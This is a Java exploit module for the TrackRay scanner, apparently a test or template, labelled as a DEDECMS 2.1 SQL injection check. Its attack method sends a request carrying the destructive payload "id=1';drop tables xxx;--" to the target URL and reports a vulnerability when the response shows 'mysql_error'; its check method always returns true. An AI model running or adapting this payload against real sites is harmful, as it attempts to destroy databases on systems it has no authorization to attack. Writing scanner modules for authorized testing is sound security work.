package com.trackray.module.exploit;

import com.trackray.base.annotation.Exploit;
import com.trackray.base.bean.*;
import com.trackray.base.enums.HttpMethod;
import com.trackray.base.enums.VulnLevel;
import com.trackray.base.enums.VulnType;
import com.trackray.base.exploit.AbstractExploit;
import com.trackray.base.utils.PageUtils;

import java.util.List;


@Exploit(value = "dedecmstest" , title = "DEDECMS 2.1 sql注入" , author = "blue", desc = "测试测试测试" )
public class DedecmsSQLi extends AbstractExploit {

    @Override
    public boolean check(Result result) {
        return true;
    }

    @Override
    public void init(Task task) {
        //..此方法可重写 也可以不用重写，主要用于初始化
    }

    @Override
    public void attack(Task task) {
        String target = task.getTargetStr();
        crawlerPage.getRequest().setUrl(target.concat("/123.php?id=1';drop tables xxx;--"));
        crawlerPage.getRequest().setHttpMethod(HttpMethod.GET);
        fetcher.run(crawlerPage);

        String content = PageUtils.getContent(crawlerPage);
        if (content.contains("mysql_error")) {
            addVul(Vulnerable.builder().description("存在dedecms漏洞")
                    .vulType(VulnType.SQL_INJECTION.getType())
                    .level(VulnLevel.DANGER.getLevel()).affectsUrl(target).build());
        }
    }

}
